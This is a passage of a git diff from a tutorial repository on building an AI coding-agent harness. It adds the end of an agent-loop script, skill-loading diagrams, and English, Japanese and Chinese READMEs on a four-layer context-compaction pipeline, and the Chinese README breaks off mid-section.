model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) + if force: + messages.append({"role": "user", "content": force}) + continue + return + + rounds_since_todo += 1 + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + if block.name == "todo_write": + rounds_since_todo = 0 + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s07: Skill Loading — catalog in SYSTEM, content on demand") + print("Type a question, press Enter. Type q to quit.\n") + + history = [] + while True: + try: + query = input("\033[36ms07 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + trigger_hooks("UserPromptSubmit", query) + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s07_skill_loading/images/skill-overview.en.svg b/s07_skill_loading/images/skill-overview.en.svg new file mode 100644 index 000000000..8b838b844 --- /dev/null +++ b/s07_skill_loading/images/skill-overview.en.svg @@ -0,0 +1,111 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Skill Loading — catalog at startup, content on demand + + + s06 preserved + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + Return result + + + + Yes + + + + trigger_hooks + PreToolUse + + + + + + + TOOL_HANDLERS + + + + bash · read · write + + edit · glob · todo + + task (subagent) + + + s07 new + + + load_skill + + + + Results appended to messages[], loop continues + + + + + + ① build_system() + Scan skills/ first line at startup + → inject SYSTEM prompt + + + + ② load_skill(name) + Read full SKILL.md at runtime + → inject tool_result + + + + SYSTEM has skill catalog, carried every turn + + + + + + + + s06 preserved (loop, hooks, TODO, subagent — unchanged) + + s07 new (startup catalog in SYSTEM + load_skill tool) + diff --git a/s07_skill_loading/images/skill-overview.ja.svg b/s07_skill_loading/images/skill-overview.ja.svg new file mode 100644 index 000000000..662351120 --- /dev/null +++ b/s07_skill_loading/images/skill-overview.ja.svg @@ -0,0 +1,111 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Skill Loading — 起動時にカタログ注入、実行時にオンデマンド読み込み + + + s06 維持 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + 結果を返す + + + + Yes + + + + trigger_hooks + PreToolUse + + + + + + + TOOL_HANDLERS + + + + bash · read · write + + edit · glob · todo + + task (subagent) + + + s07 新規 + + + load_skill + + + + 結果を messages[] に追加、ループ継続 + + + + + + ① build_system() + 起動時に skills/ の 1 行目をスキャン + → SYSTEM プロンプトに注入 + + + + ② load_skill(name) + 実行時に完全な SKILL.md を読み取り + → tool_result に注入 + + + + SYSTEM にスキルカタログ、毎ターン携帯 + + + + + + + + s06 維持(ループ、フック、TODO、サブ Agent — 変更なし) + + s07 新規(起動時カタログ注入 SYSTEM + load_skill ツール) + diff --git a/s07_skill_loading/images/skill-overview.svg b/s07_skill_loading/images/skill-overview.svg new file mode 100644 index 000000000..ae6c1d5ec --- /dev/null +++ b/s07_skill_loading/images/skill-overview.svg @@ -0,0 +1,111 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Skill Loading — 启动时注入目录,运行时按需加载内容 + + + s06 保留 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + + + 返回结果 + + + + + + + + trigger_hooks + PreToolUse + + + + + + + TOOL_HANDLERS + + + + bash · read · write + + edit · glob · todo + + task (subagent) + + + s07 新增 + + + load_skill + + + + 结果追加到 messages[],循环继续 + + + + + + ① build_system() + 启动时扫描 skills/ 第一行 + → 注入 SYSTEM prompt + + + + ② load_skill(name) + 运行时读完整 SKILL.md + → 注入 tool_result + + + + SYSTEM 含技能目录,每轮都带 + + + + + + + + s06 保留(循环、钩子、TODO、subagent — 完全不变) + + s07 新增(启动时目录注入 SYSTEM + load_skill 工具) + diff --git a/s08_context_compact/README.en.md b/s08_context_compact/README.en.md new file mode 100644 index 000000000..89e9e4ede --- /dev/null +++ b/s08_context_compact/README.en.md @@ -0,0 +1,265 @@ +# s08: Context Compact — Context Will Fill Up, Have a Way to Make Room + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → s07 → `s08` → [s09](../s09_memory/) → s10 → ... → s19 +> *"Context will fill up — have a way to make room"* — Four-layer compression pipeline: cheap first, expensive last. +> +> **Harness Layer**: Compression — clean memory, unlimited sessions. + +--- + +## The Problem + +The agent is running along, then freezes. + +It has bash, read, write — all the capabilities it needs. But it read a 1000-line file (~4000 tokens), then read 30 more files, ran 20 commands. Every command's output, every file's contents, all pile up in the `messages` list. + +The context window is finite. Once full, the API outright rejects the call — `prompt_too_long`. + +**Without compression, an agent simply cannot work on large projects.** + +--- + +## The Solution + +![Compact Overview](images/compact-overview.en.svg) + +Everything from s07 — the loop, skill loading, sub-agents — stays intact. The only change: insert three pre-processors (0 API calls) before each LLM call, trigger an LLM summary (1 API call) when tokens still exceed the threshold, and emergency-trim if the API throws an error. + +The core design in one sentence: **cheap first, expensive last.** + +--- + +## How It Works + +![Four-layer compression pipeline](images/compaction-layers.en.svg) + +### L1: snip_compact — Trim Irrelevant Old Conversation + +The agent ran 80 turns of conversation, accumulating 160 `messages`. The very first "help me create hello.py" is barely relevant to current work, yet it still occupies space. + +Message count exceeds 50 → keep the first 3 (initial context) and the last 47 (current work), trim the middle: + +```python +def snip_compact(messages, max_messages=50): + if len(messages) <= max_messages: + return messages + keep_head, keep_tail = 3, max_messages - 3 + snipped = len(messages) - keep_head - keep_tail + placeholder = {"role": "user", + "content": f"[snipped {snipped} messages from conversation middle]"} + return messages[:keep_head] + [placeholder] + messages[-keep_tail:] +``` + +Entire messages are trimmed, but `tool_result` content within remaining messages keeps accumulating — message #34 may still hold 30KB of old file contents. → L2. + +### L2: micro_compact — Placeholder for Old Tool Results + +![Old results placeholder](images/micro-compact.en.svg) + +The agent read 10 files consecutively. The full contents of reads 1–7 are still sitting in context, no longer needed, but hogging large amounts of space. + +Keep only the 3 most recent `tool_result` entries intact; replace older ones with a one-line placeholder: + +```python +KEEP_RECENT_TOOL_RESULTS = 3 + +def micro_compact(messages): + tool_results = collect_tool_result_blocks(messages) + if len(tool_results) <= KEEP_RECENT_TOOL_RESULTS: + return messages + for _, _, block in tool_results[:-KEEP_RECENT_TOOL_RESULTS]: + if len(block.get("content", "")) > 120: + block["content"] = "[Earlier tool result compacted. Re-run if needed.]" + return messages +``` + +Old results are cleared, but a single new result can be 500KB — one `cat` of a large file can max out the context. → L3. + +### L3: tool_result_budget — Persist Large Results to Disk + +![Large results to disk](images/layer1-budget.en.svg) + +The model read 5 large files in one go; all `tool_result` blocks in the last user message total 500KB. + +Sum the size of all `tool_result` blocks in the last user message. If over 200KB → sort by size, starting from the largest, persist to `.task_outputs/tool-results/`, keeping only a `` marker + a 2000-character preview in context. The model sees the marker and knows the full content is on disk, re-reading it when needed. + +```python +def tool_result_budget(messages, max_bytes=200_000): + last = messages[-1] + blocks = [(i, b) for i, b in enumerate(last["content"]) + if b.get("type") == "tool_result"] + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + if total <= max_bytes: + return messages + ranked = sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True) + for idx, block in ranked: + if total <= max_bytes: + break + block["content"] = persist_large_output(block["tool_use_id"], str(block["content"])) + total = recalculate_total(blocks) + return messages +``` + +The first three layers are all plain-text / structural operations — 0 API calls — but they cannot "understand" conversation content. Context may still be too large. → L4. + +### L4: compact_history — Full LLM Summary + +![Full LLM summary](images/auto-compact.en.svg) + +All three previous layers have run, but after 30 minutes of continuous work on a huge project, tokens still exceed the threshold. + +Three-step process: + +1. **Save transcript**: Write the full conversation to `.transcripts/` in JSONL format. No information is lost — it's simply moved out of active context. +2. **LLM generates summary**: Send conversation history to the LLM, asking it to preserve key information: current goals, important findings, modified files, remaining work, user constraints, etc. +3. **Replace message list**: All old messages are replaced with a single summary. After summarization, the most recent file contents are automatically re-attached so the model doesn't lose current file context. + +```python +def compact_history(messages, state): + transcript_path = write_transcript(messages) # Save full conversation first + summary = summarize_history(messages) # LLM generates summary + state.has_compacted = True + return [{"role": "user", + "content": f"[Compacted]\n\n{summary}"}] +``` + +**Circuit breaker**: After 3 consecutive failures, stop retrying to prevent an infinite loop wasting API calls. + +### Reactive: reactive_compact + +Sometimes the API still returns `prompt_too_long` (413) — when context grows faster than compression triggers. + +This triggers **reactive_compact**: more aggressive than compact_history, it retreats from the tail, trimming to an API-acceptable size with byte-level precision, keeping only the last 5 messages + summary. + +```python +def reactive_compact(messages): + transcript = write_transcript(messages) + summary = summarize_history(messages) + tail = messages[-5:] + return [{"role": "user", + "content": f"[Reactive compact]\n\n{summary}"}, *tail] +``` + +### Putting It All Together + +```python +def agent_loop(messages, state): + while True: + # Three pre-processors (0 API calls) + messages[:] = snip_compact(messages) # Trim middle + messages[:] = micro_compact(messages) # Old results placeholder + messages[:] = tool_result_budget(messages) # Large results to disk + + # Still too much? LLM summary (1 API call) + if estimate_token_count(messages) > THRESHOLD: + messages[:] = compact_history(messages, state) + + try: + response = client.messages.create(...) + except PromptTooLongError: + messages[:] = reactive_compact(messages) # Emergency + continue + # ... tool execution ... +``` + +**The order must not be swapped.** Cheap first, expensive last. Emergency triggers only on error. + +--- + +## Changes From s07 + +| Component | Before (s07) | After (s08) | +|-----------|-------------|-------------| +| Context management | None (context grows unbounded) | Four-layer compression pipeline + emergency | +| New functions | — | snip_compact, micro_compact, tool_result_budget, compact_history, reactive_compact | +| Tools | bash, read_file, write_file, edit_file, glob, todo_write, task, load_skill (8) | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | +| Loop | LLM call → tool execution | Three pre-processors before each turn + threshold-triggered compact_history | +| Design principle | — | Cheap first, expensive last | + +--- + +## Try It + +```sh +cd learn-claude-code +python s08_context_compact/code.py +``` + +Try these prompts: + +1. `Read the file README.md, then read code.py, then read s01_agent_loop/README.md` (read multiple files consecutively, observe L2 compressing old results) +2. `Read every file in s08_context_compact/` (read a large amount of content at once, observe L3 persisting to disk) +3. Chat for 20+ turns, observe whether `[auto compact]` or `[reactive compact]` appears + +What to watch for: After each tool execution, are old `tool_result` entries compressed? When tokens exceed the threshold after extended conversation, is summarization triggered automatically? + +--- + +## What's Next + +Context compression lets an agent run for a long time without crashing. But after each compression, the preferences and constraints the user told it are also lost. Can we let the agent **selectively remember** important things? + +s09 Memory → three subsystems: choosing what to remember, extracting key information, consolidating and organizing. Across compressions, across sessions. + +
+Deep Dive Into CC Source Code + +> The following is based on a complete analysis of CC source code `compact.ts` (1705 lines), `autoCompact.ts` (351 lines), and `microCompact.ts`. + +### Execution Order Comparison + +| Dimension | Teaching Version | Claude Code | +|-----------|-----------------|-------------| +| Execution order | snip → micro → budget → auto | Identical (`query.ts:379-543`) | +| snip_compact | Keep head 3 + tail 47 | Same; CC only enables it on main thread | +| micro_compact | Text placeholder replacement | API `cache_edits` (does not break prompt cache) | +| micro_compact whitelist | By position (most recent 3) | Read/Bash/Grep/Glob/WebSearch/WebFetch/Edit/Write | +| tool_result_budget | 200KB characters | 200,000 characters (~50K tokens), identical | +| compact_history threshold | Character count estimate | Precise tokens: `contextWindow - maxOutputTokens - 13_000` | +| Summary requirements | 5 categories of info | 9 sections + ``/`` dual tags | +| Compression prompt | Simple prompt | Double-ended hard guardrails forbidding tool calls | +| reactive_compact | Yes (simplified) | Byte-level precision retreat groups | +| Post-compaction recovery | None | Auto re-read recent files | +| Circuit breaker | 3 times | 3 times (telemetry-driven design) | + +### Full Constant Reference + +| Constant | Value | Source File | +|----------|-------|-------------| +| `AUTOCOMPACT_BUFFER_TOKENS` | 13,000 | `autoCompact.ts:62` | +| `MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES` | 3 | `autoCompact.ts:70` | +| `MAX_OUTPUT_TOKENS_FOR_SUMMARY` | 20,000 | `autoCompact.ts:30` | +| `POST_COMPACT_TOKEN_BUDGET` | 50,000 | `compact.ts:123` | +| `POST_COMPACT_MAX_FILES_TO_RESTORE` | 5 | `compact.ts:122` | +| `POST_COMPACT_MAX_TOKENS_PER_FILE` | 5,000 | `compact.ts:124` | +| Time micro_compact interval | 60 minutes | `timeBasedMCConfig.ts:32` | +| PTL retry count | 3 | `compact.ts:227` | +| Stream retry count | 2 | `compact.ts:131` | + +### contextCollapse and sessionMemoryCompact + +CC source code has two additional mechanisms not covered in this teaching version: + +- **contextCollapse**: An independent context management system that, when enabled, completely replaces compact_history. It depends on CC's internal compiled modules, so the teaching version does not cover it. +- **sessionMemoryCompact**: Before compact_history, CC first attempts a lightweight summary using existing session memory (covered in s09) without calling the LLM. This mechanism becomes clearer after learning s09. + +### What Does the Compression Prompt Look Like? + +CC's compression prompt has two hard requirements: + +1. **Absolutely no tool calls**: It begins with `CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.`, and appends another REMINDER at the end +2. **Analyze first, then summarize**: The model must first reason in an `` tag, then output the formal summary in a `` tag. The analysis is stripped during formatting + +### Teaching Version Simplifications Are Intentional + +- micro_compact uses text placeholders → we don't have API-level `cache_edits` access +- Tokens estimated via character count → precise tokenizers are out of scope +- Two auxiliary mechanisms not covered → they fall in the 10% detail category + +**The core design principle — cheap first, expensive last — is fully preserved.** + +
+ + diff --git a/s08_context_compact/README.ja.md b/s08_context_compact/README.ja.md new file mode 100644 index 000000000..b77ee5be0 --- /dev/null +++ b/s08_context_compact/README.ja.md @@ -0,0 +1,265 @@ +# s08: Context Compact — Context will fill up, have a way to make room + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → s07 → `s08` → [s09](../s09_memory/) → s10 → ... → s19 +> *"Context will fill up — have a way to make room"* — 4層圧縮戦略、安価なものを先に、高価なものを後に実行。 +> +> **Harness レイヤー**: 圧縮 — クリーンな記憶、無限のセッション。 + +--- + +## 課題 + +Agent が動いている途中で、止まってしまう。 + +bash、read、write は揃っており、能力は十分。しかし 1000 行のファイル(~4000 token)を読み、さらに 30 のファイルを読み、20 のコマンドを実行したとします。各コマンドの出力、各ファイルの内容がすべて `messages` リストに蓄積されます。 + +コンテキストウィンドウには上限があります。満杯になると、API は即座に拒否します — `prompt_too_long`。 + +**圧縮しなければ、Agent は大規模プロジェクトではまともに動けません。** + +--- + +## ソリューション + +![Compact Overview](images/compact-overview.ja.svg) + +s07 のループ、スキルロード、サブAgent はすべてそのまま。唯一の変更点:各ラウンドの LLM 呼び出し前に 3 層のプリプロセッサ(0 API)を挿入し、token が閾値を超えた場合は LLM 要約(1 API)をトリガー、API エラー時には緊急トリムを実行。 + +コア設計は一言:**安価なものを先に、高価なものを後に。** + +--- + +## 仕組み + +![4層圧縮パイプライン](images/compaction-layers.ja.svg) + +### L1: snip_compact — 無関係な古い会話を切り捨て + +Agent が 80 ラウンドの会話を実行し、`messages` が 160 件まで溜まった。先頭の「hello.py を作って」は現在の作業とほぼ無関係だが、スペースを占有し続けている。 + +メッセージ数が 50 を超えた場合 → 先頭 3 件(初期コンテキスト)と末尾 47 件(現在の作業)を保持し、中間を切り捨て: + +```python +def snip_compact(messages, max_messages=50): + if len(messages) <= max_messages: + return messages + keep_head, keep_tail = 3, max_messages - 3 + snipped = len(messages) - keep_head - keep_tail + placeholder = {"role": "user", + "content": f"[snipped {snipped} messages from conversation middle]"} + return messages[:keep_head] + [placeholder] + messages[-keep_tail:] +``` + +メッセージ全体は切り捨てたが、残ったメッセージ内の `tool_result` 内容はまだ蓄積され続けている — 34 番目のメッセージに 30KB の古いファイル内容が残っているかもしれない。→ L2。 + +### L2: micro_compact — 古いツール結果をプレースホルダに置換 + +![古い結果のプレースホルダ](images/micro-compact.ja.svg) + +Agent が連続して 10 個のファイルを読んだ。1〜7 回目の完全な内容はまだコンテキストに残っており、もう不要だが、大量のスペースを占有している。 + +直近 3 件の `tool_result` の完全な内容のみを保持し、それより古いものは 1 行のプレースホルダに置換: + +```python +KEEP_RECENT_TOOL_RESULTS = 3 + +def micro_compact(messages): + tool_results = collect_tool_result_blocks(messages) + if len(tool_results) <= KEEP_RECENT_TOOL_RESULTS: + return messages + for _, _, block in tool_results[:-KEEP_RECENT_TOOL_RESULTS]: + if len(block.get("content", "")) > 120: + block["content"] = "[Earlier tool result compacted. Re-run if needed.]" + return messages +``` + +古い結果はクリーンアップされたが、1 件の新しい結果だけで 500KB の可能性がある — 大きなファイルを `cat` するだけでコンテキストがいっぱいになる。→ L3。 + +### L3: tool_result_budget — 大きな結果をディスクに退避 + +![大きな結果のディスク退避](images/layer1-budget.ja.svg) + +モデルが一度に 5 つの大きなファイルを読み、1 つの user メッセージ内の全 `tool_result` の合計が 500KB に達した。 + +最後の user メッセージ内のすべての `tool_result` の合計サイズを集計。200KB を超えた場合 → サイズ順にソートし、最大のものから順に `.task_outputs/tool-results/` に退避。コンテキストには `` マーカー + 先頭 2000 文字のプレビューのみを残す。モデルはマーカーを見て完全な内容がディスク上にあることを認識し、必要に応じて再読み込みできる。 + +```python +def tool_result_budget(messages, max_bytes=200_000): + last = messages[-1] + blocks = [(i, b) for i, b in enumerate(last["content"]) + if b.get("type") == "tool_result"] + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + if total <= max_bytes: + return messages + ranked = sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True) + for idx, block in ranked: + if total <= max_bytes: + break + block["content"] = persist_large_output(block["tool_use_id"], str(block["content"])) + total = recalculate_total(blocks) + return messages +``` + +最初の 3 層はすべて純粋なテキスト/構造操作 — 0 API 呼び出しだが、会話内容を「理解」することはできない。コンテキストがまだ大きすぎる可能性がある。→ L4。 + +### L4: compact_history — LLM 全量要約 + +![LLM 全量要約](images/auto-compact.ja.svg) + +最初の 3 層がすべて実行されたが、超大規模プロジェクトで 30 分間連続作業すると、token がまだ閾値を超えている。 + +3 ステップのフロー: + +1. **transcript を保存**:完全な会話を `.transcripts/` に JSONL 形式で書き出す。情報は失われておらず、アクティブなコンテキストから移動されただけ。 +2. **LLM で要約を生成**:会話履歴を LLM に送り、現在の目標、重要な発見、変更済みファイル、残りの作業、ユーザーの制約などの重要な情報を保持するよう指示。 +3. **メッセージリストを置換**:すべての古いメッセージが 1 件の要約に置き換えられる。要約後、直近のファイル内容が自動的に再付加され、モデルが現在のファイルコンテキストを失わないようにする。 + +```python +def compact_history(messages, state): + transcript_path = write_transcript(messages) # 先に完全な会話を保存 + summary = summarize_history(messages) # LLM で要約を生成 + state.has_compacted = True + return [{"role": "user", + "content": f"[Compacted]\n\n{summary}"}] +``` + +**サーキットブレーカー**:連続 3 回失敗したらリトライを停止し、無限ループによる API 呼び出しの浪費を防止。 + +### 緊急: reactive_compact + +API がまだ `prompt_too_long`(413)を返すことがある — コンテキストの増加速度が圧縮のトリガー速度を上回る場合。 + +この時 **reactive_compact** がトリガーされる:compact_history よりもさらに積極的で、末尾からバイト単位の精度で API が受け入れ可能なサイズまで切り詰め、最後の 5 件のメッセージ + 要約のみを保持。 + +```python +def reactive_compact(messages): + transcript = write_transcript(messages) + summary = summarize_history(messages) + tail = messages[-5:] + return [{"role": "user", + "content": f"[Reactive compact]\n\n{summary}"}, *tail] +``` + +### 合わせて実行 + +```python +def agent_loop(messages, state): + while True: + # 3 つのプリプロセッサ(0 API 呼び出し) + messages[:] = snip_compact(messages) # 中間を切り捨て + messages[:] = micro_compact(messages) # 古い結果をプレースホルダに + messages[:] = tool_result_budget(messages) # 大きな結果をディスクに退避 + + # まだ足りない?LLM 要約(1 API 呼び出し) + if estimate_token_count(messages) > THRESHOLD: + messages[:] = compact_history(messages, state) + + try: + response = client.messages.create(...) + except PromptTooLongError: + messages[:] = reactive_compact(messages) # 緊急対応 + continue + # ... ツール実行 ... +``` + +**順序は変えられない。** 安価なものを先に、高価なものを後に。緊急対応はエラー発生時のみトリガー。 + +--- + +## s07 からの変更点 + +| コンポーネント | 変更前 (s07) | 変更後 (s08) | +|------|-----------|-----------| +| コンテキスト管理 | なし(コンテキストが無限に膨張) | 4 層圧縮パイプライン + 緊急対応 | +| 新規関数 | — | snip_compact, micro_compact, tool_result_budget, compact_history, reactive_compact | +| ツール | bash, read_file, write_file, edit_file, glob, todo_write, task, load_skill (8) | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | +| ループ | LLM 呼び出し → ツール実行 | 各ラウンド前に 3 層プリプロセッサを実行 + 閾値で compact_history をトリガー | +| 設計原則 | — | 安価なものを先に、高価なものを後に | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s08_context_compact/code.py +``` + +以下のプロンプトを試してみてください: + +1. `Read the file README.md, then read code.py, then read s01_agent_loop/README.md`(連続して複数のファイルを読み、L2 の古い結果圧縮を観察) +2. `Read every file in s08_context_compact/`(一度に大量の内容を読み込み、L3 のディスク退避を観察) +3. 20+ ラウンドの対話を繰り返し、`[auto compact]` または `[reactive compact]` が表示されるか観察 + +観察のポイント:ツール実行のたびに、古い tool_result は圧縮されているか?連続対話で token が閾値を超えたとき、要約が自動的にトリガーされたか? + +--- + +## 次へ + +コンテキスト圧縮により、Agent は長時間クラッシュせずに動けるようになった。しかし、圧縮のたびにユーザーが以前に伝えた偏好や制約も一緒に失われてしまう。Agent が重要なことを **選択的に記憶** できるようにできないか? + +s09 Memory → 3 つのサブシステム:何を記憶するかの選択、重要情報の抽出、整理と統合。圧縮を越え、セッションを越えて。 + +
+CC ソースコードの詳細 + +> 以下は CC ソースコード `compact.ts`(1705 行)、`autoCompact.ts`(351 行)、`microCompact.ts` の完全な分析に基づく。 + +### 実行順序の対応 + +| 項目 | 教学版 | Claude Code | +|------|--------|-------------| +| 実行順序 | snip → micro → budget → auto | 完全に同一(`query.ts:379-543`) | +| snip_compact | 先頭 3 + 末尾 47 を保持 | 同じ、CC はメインスレッドのみ有効 | +| micro_compact | テキストプレースホルダで置換 | API の `cache_edits`(prompt cache を破壊しない) | +| micro_compact ホワイトリスト | 位置による(直近 3 件) | Read/Bash/Grep/Glob/WebSearch/WebFetch/Edit/Write | +| tool_result_budget | 200KB 文字 | 200,000 文字(~50K token)、完全に同一 | +| compact_history 閾値 | 文字数で推定 | 精密な token 数:`contextWindow - maxOutputTokens - 13_000` | +| 要約の要求 | 5 種類の情報 | 9 つのセクション + ``/`` デュアルタグ | +| 圧縮プロンプト | シンプルなプロンプト | 先頭と末尾に二重の安全ガードでツール呼び出しを禁止 | +| reactive_compact | あり(簡略版) | バイト精度のグループ単位ロールバック | +| 圧縮後のリカバリ | なし | 直近のファイルを自動再読み込み | +| サーキットブレーカー | 3 回 | 3 回(テレメトリ駆動設計) | + +### 完全な定数リファレンス + +| 定数 | 値 | ソースファイル | +|------|-----|--------| +| `AUTOCOMPACT_BUFFER_TOKENS` | 13,000 | `autoCompact.ts:62` | +| `MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES` | 3 | `autoCompact.ts:70` | +| `MAX_OUTPUT_TOKENS_FOR_SUMMARY` | 20,000 | `autoCompact.ts:30` | +| `POST_COMPACT_TOKEN_BUDGET` | 50,000 | `compact.ts:123` | +| `POST_COMPACT_MAX_FILES_TO_RESTORE` | 5 | `compact.ts:122` | +| `POST_COMPACT_MAX_TOKENS_PER_FILE` | 5,000 | `compact.ts:124` | +| 時間ベース micro_compact 間隔 | 60 分 | `timeBasedMCConfig.ts:32` | +| PTL リトライ回数 | 3 | `compact.ts:227` | +| ストリームリトライ回数 | 2 | `compact.ts:131` | + +### contextCollapse と sessionMemoryCompact + +CC ソースコードには、この教学版では展開していない 2 つのメカニズムが存在する: + +- **contextCollapse**:独立したコンテキスト管理システムで、有効時には compact_history を完全に置き換える。CC の内部コンパイルモジュールに依存するため、教学版では展開しない。 +- **sessionMemoryCompact**:compact_history の前に、CC は既存の session memory(s09 で解説)を使った軽量要約を先に試みる。LLM を呼び出さない。このメカニズムは s09 を学んだ後に振り返るとより理解しやすい。 + +### 圧縮プロンプトの中身 + +CC の圧縮プロンプトには 2 つの厳格な要件がある: + +1. **ツール呼び出しの絶対禁止**:冒頭が `CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.` で、末尾にも再度 REMINDER がある +2. **先に分析してから要約**:モデルはまず `` タグで思考を整理し、その後 `` タグで正式な要約を出力する。analysis はフォーマット時に除去される + +### 教学版の簡略化は意図的 + +- micro_compact でテキストプレースホルダを使用 → API 層の `cache_edits` 権限がないため +- token を文字数で推定 → 精密な tokenizer は教学の対象外 +- 2 つの補助メカニズムを展開しない → 10% の細部に属する + +**コア設計思想 — 安価なものを先に、高価なものを後に — は完全に保持されている。** + +
+ + diff --git a/s08_context_compact/README.md b/s08_context_compact/README.md new file mode 100644 index 000000000..5633aaf1f --- /dev/null +++ b/s08_context_compact/README.md @@ -0,0 +1,265 @@ +# s08: Context Compact — 上下文总会满,要有办法腾地方 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → s07 → `s08` → [s09](../s09_memory/) → s10 → ... → s19 +> *"上下文总会满, 要有办法腾地方"* — 四层压缩策略, 便宜的先跑贵的后跑。 +> +> **Harness 层**: 压缩 — 干净的记忆, 无限的会话。 + +--- + +## 问题 + +Agent 跑着跑着,不动了。 + +手里有 bash、有 read、有 write,能力是够的。但它读了一个 1000 行的文件(~4000 token),又读了 30 个文件,跑了 20 条命令。每条命令的输出、每个文件的内容,全都堆在 `messages` 列表里。 + +上下文窗口是有限的。满了之后,API 直接拒绝——`prompt_too_long`。 + +**不压缩,Agent 根本没法在大项目里干活。** + +--- + +## 解决方案 + +![Compact Overview](images/compact-overview.svg) + +s07 的循环、技能加载、子 Agent 全部保留。唯一的变动:每轮 LLM 调用前插入三层预处理器(0 API),token 仍超阈值时触发 LLM 摘要(1 API),API 报错时应急裁剪。 + +核心设计就一句话:**便宜的先跑,贵的后跑。** + +--- + +## 工作原理 + +![四层压缩管线](images/compaction-layers.svg) + +### L1: snip_compact — 裁掉无关的旧对话 + +Agent 跑了 80 轮对话,`messages` 攒了 160 条。最前面的"帮我创建 hello.py"和当前工作几乎无关了,但全占着位置。 + +消息数超过 50 条 → 保留头部 3 条(初始上下文)和尾部 47 条(当前工作),中间裁掉: + +```python +def snip_compact(messages, max_messages=50): + if len(messages) <= max_messages: + return messages + keep_head, keep_tail = 3, max_messages - 3 + snipped = len(messages) - keep_head - keep_tail + placeholder = {"role": "user", + "content": f"[snipped {snipped} messages from conversation middle]"} + return messages[:keep_head] + [placeholder] + messages[-keep_tail:] +``` + +裁掉了整条消息,但剩下的消息里 `tool_result` 内容仍在累积——第 34 条消息里可能躺着 30KB 的旧文件内容。→ L2。 + +### L2: micro_compact — 旧工具结果占位 + +![旧结果占位](images/micro-compact.svg) + +Agent 连续读了 10 个文件。第 1-7 次的完整内容还躺在上下文里,早就不需要了,但占着大量空间。 + +只保留最近 3 条 `tool_result` 的完整内容,更旧的替换为一行占位符: + +```python +KEEP_RECENT_TOOL_RESULTS = 3 + +def micro_compact(messages): + tool_results = collect_tool_result_blocks(messages) + if len(tool_results) <= KEEP_RECENT_TOOL_RESULTS: + return messages + for _, _, block in tool_results[:-KEEP_RECENT_TOOL_RESULTS]: + if len(block.get("content", "")) > 120: + block["content"] = "[Earlier tool result compacted. Re-run if needed.]" + return messages +``` + +旧结果清掉了,但单条新结果可能就有 500KB——一个 `cat` 大文件的输出就能打满上下文。→ L3。 + +### L3: tool_result_budget — 大结果落盘 + +![大结果落盘](images/layer1-budget.svg) + +模型一次读了 5 个大文件,单条 user 消息里所有 `tool_result` 加起来 500KB。 + +统计最后一条 user 消息里所有 `tool_result` 的总大小。超过 200KB → 按大小排序,从最大的开始落盘到 `.task_outputs/tool-results/`,上下文里只留 `` 标记 + 前 2000 字符预览。模型看到标记后知道完整内容在磁盘上,需要时可以重新读。 + +```python +def tool_result_budget(messages, max_bytes=200_000): + last = messages[-1] + blocks = [(i, b) for i, b in enumerate(last["content"]) + if b.get("type") == "tool_result"] + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + if total <= max_bytes: + return messages + ranked = sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True) + for idx, block in ranked: + if total <= max_bytes: + break + block["content"] = persist_large_output(block["tool_use_id"], str(block["content"])) + total = recalculate_total(blocks) + return messages +``` + +前三层都是纯文本/结构操作——0 API 调用,但也无法"理解"对话内容。上下文可能仍然太大。→ L4。 + +### L4: compact_history — LLM 全量摘要 + +![LLM 全量摘要](images/auto-compact.svg) + +前三层全跑完了,但在超大项目中连续工作 30 分钟后,token 仍然超过阈值。 + +三步流程: + +1. **保存 transcript**:完整对话写入 `.transcripts/`,JSONL 格式。信息没有丢失,只是移出了活跃上下文。 +2. **LLM 生成摘要**:把对话历史发给 LLM,要求保留当前目标、重要发现、已改文件、剩余工作、用户约束等关键信息。 +3. **替换消息列表**:所有旧消息被替换为一条摘要。摘要后自动重新附加最近几个文件的内容,确保模型不会丢失当前文件上下文。 + +```python +def compact_history(messages, state): + transcript_path = write_transcript(messages) # 先保存完整对话 + summary = summarize_history(messages) # LLM 生成摘要 + state.has_compacted = True + return [{"role": "user", + "content": f"[Compacted]\n\n{summary}"}] +``` + +**熔断器**:连续失败 3 次后停止重试,防止死循环浪费 API 调用。 + +### 应急: reactive_compact + +有时候 API 还是返回 `prompt_too_long`(413)——上下文增长速度快于压缩触发速度时。 + +这时触发 